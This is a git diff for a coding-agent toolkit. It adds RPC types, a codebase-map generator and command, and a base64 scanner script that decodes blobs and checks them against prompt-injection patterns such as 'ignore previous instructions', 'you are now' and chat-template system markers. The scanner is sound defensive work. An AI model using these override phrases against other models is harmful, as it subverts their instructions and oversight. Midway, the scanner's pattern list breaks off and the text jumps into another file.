type: "response"; + command: "cycle_thinking_level"; + success: true; + data: { level: ThinkingLevel } | null; + } + + // Queue modes + | { id?: string; type: "response"; command: "set_steering_mode"; success: true } + | { id?: string; type: "response"; command: "set_follow_up_mode"; success: true } + + // Compaction + | { id?: string; type: "response"; command: "compact"; success: true; data: CompactionResult } + | { id?: string; type: "response"; command: "set_auto_compaction"; success: true } + + // Retry + | { id?: string; type: "response"; command: "set_auto_retry"; success: true } + | { id?: string; type: "response"; command: "abort_retry"; success: true } + + // Bash + | { id?: string; type: "response"; command: "bash"; success: true; data: BashResult } + | { id?: string; type: "response"; command: "abort_bash"; success: true } + + // Session + | { id?: string; type: "response"; command: "get_session_stats"; success: true; data: SessionStats } + | { id?: string; type: "response"; command: "export_html"; success: true; data: { path: string } } + | { id?: string; type: "response"; command: "switch_session"; success: true; data: { cancelled: boolean } } + | { id?: string; type: "response"; command: "fork"; success: true; data: { text: string; cancelled: boolean } } + | { + id?: string; + type: "response"; + command: "get_fork_messages"; + success: true; + data: { messages: Array<{ entryId: string; text: string }> }; + } + | { + id?: string; + type: "response"; + command: "get_last_assistant_text"; + success: true; + data: { text: string | null }; + } + | { id?: string; type: "response"; command: "set_session_name"; success: true } + + // Messages — AgentMessage is opaque for SDK consumers + | { id?: string; type: "response"; command: "get_messages"; success: true; data: { messages: unknown[] } } + + // Commands + | { + id?: string; + type: "response"; + command: "get_commands"; + success: true; + data: { commands: RpcSlashCommand[] }; + } + + // Bridge-hosted native terminal + | { id?: string; type: "response"; command: "terminal_input"; success: true } + | { id?: string; type: "response"; command: "terminal_resize"; success: true } + | { id?: string; type: "response"; command: "terminal_redraw"; success: true } + + // v2 Protocol + | { id?: string; type: "response"; command: "init"; success: true; data: RpcInitResult } + | { id?: string; type: "response"; command: "shutdown"; success: true } + | { id?: string; type: "response"; command: "subscribe"; success: true } + + // Error response (any command can fail) + | { id?: string; type: "response"; command: string; success: false; error: string }; + +// ============================================================================ +// v2 Protocol Types +// ============================================================================ + +/** Result of the init handshake (v2 only) */ +export interface RpcInitResult { + protocolVersion: 2; + sessionId: string; + capabilities: { + events: string[]; + commands: string[]; + }; +} + +/** v2 execution_complete event — emitted when a prompt/steer/follow_up finishes */ +export interface RpcExecutionCompleteEvent { + type: "execution_complete"; + runId: string; + status: "completed" | "error" | "cancelled"; + reason?: string; + stats: SessionStats; +} + +/** v2 cost_update event — emitted per-turn with running cost data */ +export interface RpcCostUpdateEvent { + type: "cost_update"; + runId: string; + turnCost: number; + cumulativeCost: number; + tokens: { + input: number; + output: number; + cacheRead: number; + cacheWrite: number; + }; +} + +/** Discriminated union of all v2-only event types */ +export type RpcV2Event = RpcExecutionCompleteEvent | RpcCostUpdateEvent; + +// ============================================================================ +// Extension UI Events (stdout) +// ============================================================================ + +/** Emitted when an extension needs user input */ +export type RpcExtensionUIRequest = + | { type: "extension_ui_request"; id: string; method: "select"; title: string; options: string[]; timeout?: number; allowMultiple?: boolean } + | { type: "extension_ui_request"; id: string; method: "confirm"; title: string; message: string; timeout?: number } + | { + type: "extension_ui_request"; + id: string; + method: "input"; + title: string; + placeholder?: string; + timeout?: number; + } + | { type: "extension_ui_request"; id: string; method: "editor"; title: string; prefill?: string } + | { + type: "extension_ui_request"; + id: string; + method: "notify"; + message: string; + notifyType?: "info" | "warning" | "error"; + } + | { + type: "extension_ui_request"; + id: string; + method: "setStatus"; + statusKey: string; + statusText: string | undefined; + } + | { + type: "extension_ui_request"; + id: string; + method: "setWidget"; + widgetKey: string; + widgetLines: string[] | undefined; + widgetPlacement?: "aboveEditor" | "belowEditor"; + } + | { type: "extension_ui_request"; id: string; method: "setTitle"; title: string } + | { type: "extension_ui_request"; id: string; method: "set_editor_text"; text: string }; + +// ============================================================================ +// Extension UI Commands (stdin) +// ============================================================================ + +/** Response to an extension UI request */ +export type RpcExtensionUIResponse = + | { type: "extension_ui_response"; id: string; value: string } + | { type: "extension_ui_response"; id: string; values: string[] } + | { type: "extension_ui_response"; id: string; confirmed: boolean } + | { type: "extension_ui_response"; id: string; cancelled: true }; + +// ============================================================================ +// Helper type for extracting command types +// ============================================================================ + +export type RpcCommandType = RpcCommand["type"]; diff --git a/packages/rpc-client/tsconfig.examples.json b/packages/rpc-client/tsconfig.examples.json new file mode 100644 index 000000000..8453c546d --- /dev/null +++ b/packages/rpc-client/tsconfig.examples.json @@ -0,0 +1,17 @@ +{ + "compilerOptions": { + "target": "ES2024", + "module": "Node16", + "lib": ["ES2024"], + "strict": true, + "esModuleInterop": true, + "skipLibCheck": true, + "moduleResolution": "Node16", + "noEmit": true, + "types": ["node"], + "paths": { + "@gsd-build/rpc-client": ["./src/index.ts"] + } + }, + "include": ["examples/**/*.ts"] +} diff --git a/packages/rpc-client/tsconfig.json b/packages/rpc-client/tsconfig.json new file mode 100644 index 000000000..779b48aca --- /dev/null +++ b/packages/rpc-client/tsconfig.json @@ -0,0 +1,24 @@ +{ + "compilerOptions": { + "target": "ES2024", + "module": "Node16", + "lib": ["ES2024"], + "strict": true, + "esModuleInterop": true, + "skipLibCheck": true, + "forceConsistentCasingInFileNames": true, + "declaration": true, + "declarationMap": true, + "sourceMap": true, + "inlineSources": true, + "inlineSourceMap": false, + "moduleResolution": "Node16", + "resolveJsonModule": true, + "allowImportingTsExtensions": false, + "types": ["node"], + "outDir": "./dist", + "rootDir": "./src" + }, + "include": ["src/**/*.ts"], + "exclude": ["node_modules", "dist", "**/*.d.ts", "src/**/*.d.ts"] +} diff --git a/pkg/package.json b/pkg/package.json index 2cf3754fc..248f9d751 100644 --- a/pkg/package.json +++ b/pkg/package.json @@ -1,6 +1,6 @@ { "name": "@glittercowboy/gsd", - "version": "2.41.0", + "version": "2.67.0", "piConfig": { "name": "gsd", "configDir": ".gsd" diff --git a/repowise.db b/repowise.db new file mode 100644 index 000000000..df702d28f Binary files /dev/null and b/repowise.db differ diff --git a/scripts/base64-scan.sh b/scripts/base64-scan.sh new file mode 100755 index 000000000..e79428430 --- /dev/null +++ b/scripts/base64-scan.sh @@ -0,0 +1,242 @@ +#!/usr/bin/env bash +# Base64 obfuscation scanner — extracts base64 blobs from changed files, +# decodes them, and checks decoded content for prompt injection patterns. +# +# Catches obfuscated directives that would bypass docs-prompt-injection-scan.sh, +# which only scans raw text in markdown files. +# +# Usage: +# scripts/base64-scan.sh # scan staged files (pre-commit mode) +# scripts/base64-scan.sh --diff origin/main # scan diff vs branch (CI mode) +# scripts/base64-scan.sh --file path # scan a specific file +# +# Works on macOS (BSD grep) and Linux (GNU grep) — uses only ERE patterns. + +set -euo pipefail + +RED='\033[0;31m' +YELLOW='\033[1;33m' +CYAN='\033[0;36m' +NC='\033[0m' + +IGNOREFILE=".base64scanignore" +EXIT_CODE=0 +FINDINGS=0 + +# Blobs shorter than this have too many false positives. +# 40 base64 chars decodes to ~30 bytes — minimum length for a meaningful directive. +MIN_BLOB_LEN=40 + +# ── Prompt injection patterns to match against decoded content ──────── +# Format: "Label:::flags:::regex" +# Mirrors the patterns in docs-prompt-injection-scan.sh but applied to +# base64-decoded content across all file types. +DECODED_PATTERNS=( + # System prompt markers + "System prompt marker:::i:::" + "System prompt marker:::i:::<\|im_start\|>system" + "System prompt marker:::i:::\[SYSTEM\][[:space:]]*:" + + # Role injection / override + "Role injection:::i:::you are now [a-z]" + "Instruction override:::i:::ignore (all )?previous instructions" + "Instruction override:::i:::ignore (all )?prior instructions" + "Instruction override:::i:::disregard (all )?(above|previous|prior)" + "Instruction override:::i:::forget (all )?(above|previous|prior) (instructions|context|rules)" + "Instruction override:::i:::new instructions:" + "Instruction override:::i:::override (all )?instructions" + "Instruction override:::i:::your new role is" + "Instruction override:::i:::from now on,? (you (are|will|must|should)|act as)" + + # Hidden HTML directives + "Hidden directive:::::: comment blocks to preserve + * descriptions for files in collapsed directories across incremental updates. + */ +export function parseCodebaseMap(content: string): Map { + const descriptions = new Map(); + let inCollapsedBlock = false; + + for (const line of content.split("\n")) { + // Track collapsed-description comment blocks + if (line.trimStart().startsWith("")) { + inCollapsedBlock = false; + continue; + } + + // Match: - `path/to/file.ts` — Description here + const match = line.match(/^- `(.+?)` — (.+)$/); + if (match) { + descriptions.set(match[1], match[2]); + continue; + } + + // Match: - `path/to/file.ts` (no description) — only outside collapsed blocks + if (!inCollapsedBlock) { + const bareMatch = line.match(/^- `(.+?)`\s*$/); + if (bareMatch) { + descriptions.set(bareMatch[1], ""); + } + } + } + return descriptions; +} + +export function parseCodebaseMapMetadata(content: string): CodebaseMapMetadata | null { + const metaLine = content + .split("\n") + .find((line) => line.trimStart().startsWith(CODEBASE_METADATA_PREFIX)); + if (!metaLine) return null; + + const trimmed = metaLine.trim(); + const jsonStart = CODEBASE_METADATA_PREFIX.length; + const jsonEnd = trimmed.lastIndexOf(" -->"); + if (jsonEnd <= jsonStart) return null; + + try { + const parsed = JSON.parse(trimmed.slice(jsonStart, jsonEnd)); + if ( + typeof parsed?.generatedAt === "string" + && typeof parsed?.fingerprint === "string" + && typeof parsed?.fileCount === "number" + && typeof parsed?.truncated === "boolean" + ) { + return parsed as CodebaseMapMetadata; + } + } catch { + // Ignore malformed metadata and treat the map as stale. + } + return null; +} + +// ─── File Enumeration ──────────────────────────────────────────────────────── + +function shouldExclude(filePath: string, excludes: string[]): boolean { + for (const pattern of excludes) { + if (pattern.endsWith("/")) { + if (filePath.startsWith(pattern) || filePath.includes(`/${pattern}`)) return true; + } else if (filePath === pattern || filePath.endsWith(`/${pattern}`)) { + return true; + } + } + // Skip binary/lock files + const ext = extname(filePath).toLowerCase(); + if ([".lock", ".png", ".jpg", ".jpeg", ".gif", ".ico", ".woff", ".woff2", ".ttf", ".eot", ".svg"].includes(ext)) { + return true; + } + return false; +} + +function lsFiles(basePath: string): string[] { + try { + const result = execSync("git ls-files", { cwd: basePath, encoding: "utf-8", timeout: 10000 }); + return result.split("\n").filter(Boolean); + } catch { + return []; + } +} + +/** + * Enumerate tracked files, applying exclusions and the maxFiles cap. + * Returns both the file list and whether truncation occurred. + */ +function enumerateFiles(basePath: string, excludes: string[], maxFiles: number): { files: string[]; truncated: boolean } { + const allFiles = lsFiles(basePath); + const filtered = allFiles.filter((f) => !shouldExclude(f, excludes)); + const truncated = filtered.length > maxFiles; + return { files: truncated ? filtered.slice(0, maxFiles) : filtered, truncated }; +} + +function resolveGeneratorOptions(options?: CodebaseMapOptions): ResolvedCodebaseMapOptions { + const excludes = [...DEFAULT_EXCLUDES, ...(options?.excludePatterns ?? [])]; + const maxFiles = options?.maxFiles ?? DEFAULT_MAX_FILES; + const collapseThreshold = options?.collapseThreshold ?? DEFAULT_COLLAPSE_THRESHOLD; + return { + excludes, + maxFiles, + collapseThreshold, + optionSignature: JSON.stringify({ + excludes, + maxFiles, + collapseThreshold, + }), + }; +} + +function computeCodebaseFingerprint( + files: string[], + resolved: ResolvedCodebaseMapOptions, + truncated: boolean, +): string { + return createHash("sha1") + .update(JSON.stringify({ + files, + truncated, + optionSignature: resolved.optionSignature, + })) + .digest("hex"); +} + +// ─── Grouping ──────────────────────────────────────────────────────────────── + +function groupByDirectory( + files: string[], + descriptions: Map, + collapseThreshold: number, +): DirectoryGroup[] { + const dirMap = new Map(); + + for (const file of files) { + const dir = dirname(file); + const dirKey = dir === "." ? "" : dir; + if (!dirMap.has(dirKey)) { + dirMap.set(dirKey, []); + } + dirMap.get(dirKey)!.push({ + path: file, + description: descriptions.get(file) ?? "", + }); + } + + const groups: DirectoryGroup[] = []; + const sortedDirs = [...dirMap.keys()].sort(); + + for (const dir of sortedDirs) { + const dirFiles = dirMap.get(dir)!; + dirFiles.sort((a, b) => a.path.localeCompare(b.path)); + + groups.push({ + path: dir, + files: dirFiles, + collapsed: dirFiles.length > collapseThreshold, + }); + } + + return groups; +} + +// ─── Rendering ─────────────────────────────────────────────────────────────── + +function renderCodebaseMap( + groups: DirectoryGroup[], + totalFiles: number, + truncated: boolean, + metadata: CodebaseMapMetadata, +): string { + const lines: string[] = []; + const described = groups.reduce((sum, g) => sum + g.files.filter((f) => f.description).length, 0); + + lines.push("# Codebase Map"); + lines.push(""); + lines.push(`Generated: ${metadata.generatedAt} | Files: ${totalFiles} | Described: ${described}/${totalFiles}`); + lines.push(`${CODEBASE_METADATA_PREFIX}${JSON.stringify(metadata)} -->`); + if (truncated) { + lines.push(`Note: Truncated to first ${totalFiles} files. Run with higher --max-files to include all.`); + } + lines.push(""); + + for (const group of groups) { + const heading = group.path || "(root)"; + lines.push(`### ${heading}/`); + + if (group.collapsed) { + // Summarize collapsed directories + const extensions = new Map(); + for (const f of group.files) { + const ext = extname(f.path) || "(no ext)"; + extensions.set(ext, (extensions.get(ext) ?? 0) + 1); + } + const extSummary = [...extensions.entries()] + .sort((a, b) => b[1] - a[1]) + .map(([ext, count]) => `${count} ${ext}`) + .join(", "); + lines.push(`- *(${group.files.length} files: ${extSummary})*`); + + // Preserve any existing descriptions in a hidden comment block so + // incremental updates can recover them via parseCodebaseMap. + const descLines = group.files + .filter((f) => f.description) + .map((f) => `- \`${f.path}\` — ${f.description}`); + if (descLines.length > 0) { + lines.push(""); + } + } else { + for (const file of group.files) { + if (file.description) { + lines.push(`- \`${file.path}\` — ${file.description}`); + } else { + lines.push(`- \`${file.path}\``); + } + } + } + lines.push(""); + } + + return lines.join("\n"); +} + +function buildCodebaseMap( + basePath: string, + resolved: ResolvedCodebaseMapOptions, + existingDescriptions?: Map, + enumerated?: EnumeratedFiles, +): { + content: string; + fileCount: number; + truncated: boolean; + files: string[]; + fingerprint: string; + generatedAt: string; +} { + const listed = enumerated ?? enumerateFiles(basePath, resolved.excludes, resolved.maxFiles); + const descriptions = existingDescriptions ?? new Map(); + const groups = groupByDirectory(listed.files, descriptions, resolved.collapseThreshold); + const generatedAt = new Date().toISOString().split(".")[0] + "Z"; + const metadata: CodebaseMapMetadata = { + generatedAt, + fingerprint: computeCodebaseFingerprint(listed.files, resolved, listed.truncated), + fileCount: listed.files.length, + truncated: listed.truncated, + }; + const content = renderCodebaseMap(groups, listed.files.length, listed.truncated, metadata); + + return { + content, + fileCount: listed.files.length, + truncated: listed.truncated, + files: listed.files, + fingerprint: metadata.fingerprint, + generatedAt, + }; +} + +// ─── Public API ────────────────────────────────────────────────────────────── + +/** + * Generate a fresh CODEBASE.md from scratch. + * Preserves existing descriptions if `existingDescriptions` is provided. + */ +export function generateCodebaseMap( + basePath: string, + options?: CodebaseMapOptions, + existingDescriptions?: Map, +): { content: string; fileCount: number; truncated: boolean; files: string[]; fingerprint: string; generatedAt: string } { + const resolved = resolveGeneratorOptions(options); + return buildCodebaseMap(basePath, resolved, existingDescriptions); +} + +/** + * Incremental update: re-scan files, preserve existing descriptions, + * add new files, remove deleted files. + */ +export function updateCodebaseMap( + basePath: string, + options?: CodebaseMapOptions, +): { + content: string; + added: number; + removed: number; + unchanged: number; + fileCount: number; + truncated: boolean; + fingerprint: string; + generatedAt: string; +} { + const codebasePath = join(gsdRoot(basePath), "CODEBASE.md"); + const resolved = resolveGeneratorOptions(options); + + // Load existing descriptions + let existingDescriptions = new Map(); + if (existsSync(codebasePath)) { + const existing = readFileSync(codebasePath, "utf-8"); + existingDescriptions = parseCodebaseMap(existing); + } + + const existingFiles = new Set(existingDescriptions.keys()); + + // Generate new map preserving descriptions — reuse the returned file list + // to avoid a second enumeration (prevents race between content and stats). + const result = buildCodebaseMap(basePath, resolved, existingDescriptions); + const currentSet = new Set(result.files); + + // Count changes + let added = 0; + let removed = 0; + + for (const f of result.files) { + if (!existingFiles.has(f)) added++; + } + for (const f of existingFiles) { + if (!currentSet.has(f)) removed++; + } + + return { + content: result.content, + added, + removed, + unchanged: result.files.length - added, + fileCount: result.fileCount, + truncated: result.truncated, + fingerprint: result.fingerprint, + generatedAt: result.generatedAt, + }; +} + +function clearFreshnessCache(basePath: string): void { + for (const key of freshnessCache.keys()) { + if (key === basePath || key.startsWith(`${basePath}::`)) { + freshnessCache.delete(key); + } + } +} + +export function ensureCodebaseMapFresh( + basePath: string, + options?: CodebaseMapOptions, + ensureOptions?: EnsureCodebaseMapOptions, +): EnsureCodebaseMapResult { + const resolved = resolveGeneratorOptions(options); + const cacheKey = `${basePath}::${resolved.optionSignature}`; + const ttlMs = ensureOptions?.ttlMs ?? DEFAULT_REFRESH_TTL_MS; + const maxAgeMs = ensureOptions?.maxAgeMs ?? DEFAULT_MAX_AGE_MS; + const force = ensureOptions?.force === true; + const now = Date.now(); + + if (!force && ttlMs > 0) { + const cached = freshnessCache.get(cacheKey); + if (cached && now - cached.checkedAt < ttlMs) { + return cached.result; + } + } + + const existing = readCodebaseMap(basePath); + const listed = enumerateFiles(basePath, resolved.excludes, resolved.maxFiles); + const fingerprint = computeCodebaseFingerprint(listed.files, resolved, listed.truncated); + + const cacheAndReturn = (result: EnsureCodebaseMapResult): EnsureCodebaseMapResult => { + freshnessCache.set(cacheKey, { checkedAt: now, result }); + return result; + }; + + if (!existing) { + const generated = buildCodebaseMap(basePath, resolved, undefined, listed); + if (generated.fileCount > 0) { + writeCodebaseMap(basePath, generated.content); + return cacheAndReturn({ + status: "generated", + fileCount: generated.fileCount, + truncated: generated.truncated, + generatedAt: generated.generatedAt, + fingerprint: generated.fingerprint, + reason: "missing", + }); + } + return cacheAndReturn({ + status: "empty", + fileCount: 0, + truncated: false, + generatedAt: null, + fingerprint, + reason: "no-tracked-files", + }); + } + + const metadata = parseCodebaseMapMetadata(existing); + const existingDescriptions = parseCodebaseMap(existing); + const ageMs = metadata ? now - Date.parse(metadata.generatedAt) : Number.POSITIVE_INFINITY; + const staleReason = + !metadata ? "missing-metadata" + : metadata.fingerprint !== fingerprint ? "files-changed" + : metadata.fileCount !== listed.files.length ? "file-count-changed" + : metadata.truncated !== listed.truncated ? "truncation-changed" + : maxAgeMs > 0 && Number.isFinite(ageMs) && ageMs > maxAgeMs ? "expired" + : undefined; + + if (!staleReason) { + return cacheAndReturn({ + status: "fresh", + fileCount: metadata?.fileCount ?? listed.files.length, + truncated: metadata?.truncated ?? listed.truncated, + generatedAt: metadata?.generatedAt ?? null, + fingerprint: metadata?.fingerprint ?? fingerprint, + }); + } + + const updated = buildCodebaseMap(basePath, resolved, existingDescriptions, listed); + if (updated.fileCount > 0) { + writeCodebaseMap(basePath, updated.content); + return cacheAndReturn({ + status: "updated", + fileCount: updated.fileCount, + truncated: updated.truncated, + generatedAt: updated.generatedAt, + fingerprint: updated.fingerprint, + reason: staleReason, + }); + } + + return cacheAndReturn({ + status: "empty", + fileCount: 0, + truncated: false, + generatedAt: null, + fingerprint, + reason: staleReason, + }); +} + +/** + * Write CODEBASE.md to .gsd/ directory. + */ +export function writeCodebaseMap(basePath: string, content: string): string { + const root = gsdRoot(basePath); + mkdirSync(root, { recursive: true }); + const outPath = join(root, "CODEBASE.md"); + writeFileSync(outPath, content, "utf-8"); + clearFreshnessCache(basePath); + return outPath; +} + +/** + * Read existing CODEBASE.md, or return null if it doesn't exist. + */ +export function readCodebaseMap(basePath: string): string | null { + const codebasePath = join(gsdRoot(basePath), "CODEBASE.md"); + if (!existsSync(codebasePath)) return null; + try { + return readFileSync(codebasePath, "utf-8"); + } catch { + return null; + } +} + +/** + * Get stats about the codebase map. + */ +export function getCodebaseMapStats(basePath: string): { + exists: boolean; + fileCount: number; + describedCount: number; + undescribedCount: number; + generatedAt: string | null; +} { + const content = readCodebaseMap(basePath); + if (!content) { + return { exists: false, fileCount: 0, describedCount: 0, undescribedCount: 0, generatedAt: null }; + } + + // Parse total file count from the header line (accurate even for collapsed dirs) + const fileCountMatch = content.match(/Files:\s*(\d+)/); + const totalFiles = fileCountMatch ? parseInt(fileCountMatch[1], 10) : 0; + + // Use parseCodebaseMap to count described files (includes collapsed-description blocks) + const descriptions = parseCodebaseMap(content); + const described = [...descriptions.values()].filter((d) => d.length > 0).length; + const dateMatch = content.match(/Generated: (\S+)/); + + return { + exists: true, + fileCount: totalFiles, + describedCount: described, + undescribedCount: totalFiles - described, + generatedAt: dateMatch?.[1] ?? null, + }; +} diff --git a/src/resources/extensions/gsd/commands-bootstrap.ts b/src/resources/extensions/gsd/commands-bootstrap.ts index 9a973c2d9..0f5c55cd1 100644 --- a/src/resources/extensions/gsd/commands-bootstrap.ts +++ b/src/resources/extensions/gsd/commands-bootstrap.ts @@ -45,6 +45,7 @@ const TOP_LEVEL_SUBCOMMANDS = [ { cmd: "start", desc: "Start a workflow template" }, { cmd: "templates", desc: "List available workflow templates" }, { cmd: "extensions", desc: "Manage extensions" }, + { cmd: "codebase", desc: "Generate, refresh, and inspect the codebase map cache" }, ] as const; function filterStartsWith( @@ -218,6 +219,15 @@ function getGsdArgumentCompletions(prefix: string) { ], "extensions"); } + if (parts[0] === "codebase" && parts.length <= 2) { + return filterStartsWith(partial, [ + { cmd: "generate", desc: "Generate or regenerate CODEBASE.md" }, + { cmd: "update", desc: "Refresh the CODEBASE.md cache immediately" }, + { cmd: "stats", desc: "Show codebase-map coverage and generation time" }, + { cmd: "help", desc: "Show usage and subcommands" }, + ], "codebase"); + } + if (parts[0] === "doctor" && parts.length <= 2) { return filterStartsWith(partial, [ { cmd: "fix", desc: "Auto-fix detected issues" }, diff --git a/src/resources/extensions/gsd/commands-codebase.ts b/src/resources/extensions/gsd/commands-codebase.ts new file mode 100644 index 000000000..20967e03f --- /dev/null +++ b/src/resources/extensions/gsd/commands-codebase.ts @@ -0,0 +1,197 @@ +/** + * GSD Command — /gsd codebase + * + * Generate and manage the codebase map (.gsd/CODEBASE.md). + * Subcommands: generate, update, stats, help + */ + +import type { ExtensionAPI, ExtensionCommandContext } from "@gsd/pi-coding-agent"; + +import { + generateCodebaseMap, + updateCodebaseMap, + writeCodebaseMap, + getCodebaseMapStats, + readCodebaseMap, +} from "./codebase-generator.js"; +import { loadEffectiveGSDPreferences } from "./preferences.js"; +import type { CodebaseMapOptions } from "./codebase-generator.js"; + +const USAGE = + "Usage: /gsd codebase [generate|update|stats]\n\n" + + " generate [--max-files N] [--collapse-threshold N] — Generate or regenerate CODEBASE.md\n" + + " update [--max-files N] [--collapse-threshold N] — Refresh the CODEBASE.md cache immediately\n" + + " stats — Show file count, coverage, and generation time\n" + + " help — Show this help\n\n" + + "With no subcommand, shows stats if a map exists or help if not.\n" + + "GSD also refreshes CODEBASE.md automatically before prompt injection and after completed units when tracked files change.\n\n" + + "Configure defaults via preferences.md:\n" + + " codebase:\n" + + " exclude_patterns: [\"docs/\", \"fixtures/\"]\n" + + " max_files: 1000\n" + + " collapse_threshold: 15"; + +export async function handleCodebase( + args: string, + ctx: ExtensionCommandContext, + _pi: ExtensionAPI, +): Promise { + const basePath = process.cwd(); + const parts = args.trim().split(/\s+/); + const sub = parts[0] ?? ""; + + switch (sub) { + case "generate": { + const options = resolveCodebaseOptions(args, ctx); + if (options === false) return; // validation failed, message already shown + + const existing = readCodebaseMap(basePath); + const existingDescriptions = existing + ? (await import("./codebase-generator.js")).parseCodebaseMap(existing) + : undefined; + + const result = generateCodebaseMap(basePath, options, existingDescriptions); + + if (result.fileCount === 0) { + ctx.ui.notify( + "Codebase map generated with 0 files.\n" + + "Is this a git repository? Run 'git ls-files' to verify.", + "warning", + ); + return; + } + + const outPath = writeCodebaseMap(basePath, result.content); + ctx.ui.notify( + `Codebase map generated: ${result.fileCount} files\n` + + `Written to: ${outPath}` + + (result.truncated ? `\n⚠ Truncated — increase --max-files to include all files` : ""), + "success", + ); + return; + } + + case "update": { + const existing = readCodebaseMap(basePath); + if (!existing) { + ctx.ui.notify( + "No codebase map found. Run /gsd codebase generate to create one.", + "warning", + ); + return; + } + + const options = resolveCodebaseOptions(args, ctx); + if (options === false) return; + + const result = updateCodebaseMap(basePath, options); + writeCodebaseMap(basePath, result.content); + + ctx.ui.notify( + `Codebase map updated: ${result.fileCount} files\n` + + ` Added: ${result.added} | Removed: ${result.removed} | Unchanged: ${result.unchanged}` + + (result.truncated ? `\n⚠ Truncated — increase --max-files to include all files` : ""), + "success", + ); + return; + } + + case "stats": { + showStats(basePath, ctx); + return; + } + + case "help": + ctx.ui.notify(USAGE, "info"); + return; + + case "": { + // Safe default: show stats if map exists, help if not + const existing = readCodebaseMap(basePath); + if (existing) { + showStats(basePath, ctx); + } else { + ctx.ui.notify(USAGE, "info"); + } + return; + } + + default: + ctx.ui.notify( + `Unknown subcommand "${sub}".\n\n${USAGE}`, + "warning", + ); + } +} + +function showStats(basePath: string, ctx: ExtensionCommandContext): void { + const stats = getCodebaseMapStats(basePath); + if (!stats.exists) { + ctx.ui.notify("No codebase map found. Run /gsd codebase generate to create one.", "info"); + return; + } + + const coverage = stats.fileCount > 0 + ? Math.round((stats.describedCount / stats.fileCount) * 100) + : 0; + + ctx.ui.notify( + `Codebase Map Stats:\n` + + ` Files: ${stats.fileCount}\n` + + ` Described: ${stats.describedCount} (${coverage}%)\n` + + ` Undescribed: ${stats.undescribedCount}\n` + + ` Generated: ${stats.generatedAt ?? "unknown"}\n\n` + + (stats.undescribedCount > 0 + ? `Tip: Auto-refresh keeps the cache current, but /gsd codebase update forces an immediate refresh.` + : `Coverage is complete.`), + "info", + ); +} + +/** + * Resolve codebase map options by merging preferences with CLI flags. + * CLI flags override preferences; preferences override built-in defaults. + * Returns false if validation failed (error already shown to user). + */ +function resolveCodebaseOptions(args: string, ctx: ExtensionCommandContext): CodebaseMapOptions | false { + // Load preferences defaults + const prefs = loadEffectiveGSDPreferences()?.preferences?.codebase; + + // Parse CLI flags + const maxFilesStr = extractFlag(args, "--max-files"); + const collapseStr = extractFlag(args, "--collapse-threshold"); + + // Validate --max-files + let maxFiles: number | undefined; + if (maxFilesStr) { + maxFiles = parseInt(maxFilesStr, 10); + if (isNaN(maxFiles) || maxFiles < 1) { + ctx.ui.notify("--max-files must be a positive integer (e.g. --max-files 200).", "warning"); + return false; + } + } + + // Validate --collapse-threshold + let collapseThreshold: number | undefined; + if (collapseStr) { + collapseThreshold = parseInt(collapseStr, 10); + if (isNaN(collapseThreshold) || collapseThreshold < 1) { + ctx.ui.notify("--collapse-threshold must be a positive integer (e.g. --collapse-threshold 15).", "warning"); + return false; + } + } + + return { + // CLI flags override preferences + maxFiles: maxFiles ?? prefs?.max_files, + collapseThreshold: collapseThreshold ?? prefs?.collapse_threshold, + excludePatterns: prefs?.exclude_patterns, + }; +} + +function extractFlag(args: string, flag: string): string | undefined { + const escaped = flag.replace(/[.*+?^${}()|[\]\\]/g, "\\$&"); + const regex = new RegExp(`${escaped}[=\\s]+(\\S+)`); + const match = args.match(regex); + return match?.[1]; +} diff --git a/src/resources/extensions/gsd/commands-config.ts b/src/resources/extensions/gsd/commands-config.ts index ec5a8b596..01cf58c14 100644 --- a/src/resources/extensions/gsd/commands-config.ts +++ b/src/resources/extensions/gsd/commands-config.ts @@ -22,6 +22,12 @@ export const TOOL_KEYS = [ { id: "groq", env: "GROQ_API_KEY", label: "Groq Voice", hint: "console.groq.com" }, ] as const; +function getStoredToolKey(auth: AuthStorage, providerId: string): string | undefined { + const creds = auth.getCredentialsForProvider(providerId); + const cred = creds.find((c) => c.type === "api_key" && c.key); + return cred?.type === "api_key" ? cred.key : undefined; +} + /** * Load tool API keys from auth.json into environment variables. * Called at session startup to ensure tools have access to their credentials. @@ -33,9 +39,9 @@ export function loadToolApiKeys(): void { const auth = AuthStorage.create(authPath); for (const tool of TOOL_KEYS) { - const cred = auth.get(tool.id); - if (cred && cred.type === "api_key" && cred.key && !process.env[tool.env]) { - process.env[tool.env] = cred.key; + const key = getStoredToolKey(auth, tool.id); + if (key && !process.env[tool.env]) { + process.env[tool.env] = key; } } } catch { @@ -55,14 +61,14 @@ export async function handleConfig(ctx: ExtensionCommandContext): Promise // Show current status const statusLines = ["GSD Tool Configuration\n"]; for (const tool of TOOL_KEYS) { - const hasKey = !!process.env[tool.env] || !!(auth.get(tool.id) as { key?: string })?.key; + const hasKey = !!process.env[tool.env] || !!getStoredToolKey(auth, tool.id); statusLines.push(` ${hasKey ? "\u2713" : "\u2717"} ${tool.label}${hasKey ? "" : ` \u2014 get key at ${tool.hint}`}`); } ctx.ui.notify(statusLines.join("\n"), "info"); // Ask which tools to configure const options = TOOL_KEYS.map(t => { - const hasKey = !!process.env[t.env] || !!(auth.get(t.id) as { key?: string })?.key; + const hasKey = !!process.env[t.env] || !!getStoredToolKey(auth, t.id); return `${t.label} ${hasKey ? "(configured \u2713)" : "(not set)"}`; }); options.push("(done)"); diff --git a/src/resources/extensions/gsd/commands-extensions.ts b/src/resources/extensions/gsd/commands-extensions.ts index e63f90405..05b867e4f 100644 --- a/src/resources/extensions/gsd/commands-extensions.ts +++ b/src/resources/extensions/gsd/commands-extensions.ts @@ -105,7 +105,7 @@ function discoverManifests(): Map { const manifests = new Map(); if (!existsSync(extDir)) return manifests; for (const entry of readdirSync(extDir, { withFileTypes: true })) { - if (!entry.isDirectory()) continue; + if (!entry.isDirectory() && !entry.isSymbolicLink()) continue; const m = readManifest(join(extDir, entry.name)); if (m) manifests.set(m.id, m); } diff --git a/src/resources/extensions/gsd/commands-handlers.ts b/src/resources/extensions/gsd/commands-handlers.ts index e43ecb0fa..16af7230b 100644 --- a/src/resources/extensions/gsd/commands-handlers.ts +++ b/src/resources/extensions/gsd/commands-handlers.ts @@ -20,7 +20,8 @@ import { selectDoctorScope, filterDoctorIssues, } from "./doctor.js"; -import { isAutoActive } from "./auto.js"; +import { isAutoActive, checkRemoteAutoSession } from "./auto.js"; +import { getAutoWorktreePath } from "./auto-worktree.js"; import { projectRoot } from "./commands/context.js"; import { loadPrompt } from "./prompt-loader.js"; @@ -42,21 +43,27 @@ export function dispatchDoctorHeal(pi: ExtensionAPI, scope: string | undefined, ); } -export async function handleDoctor(args: string, ctx: 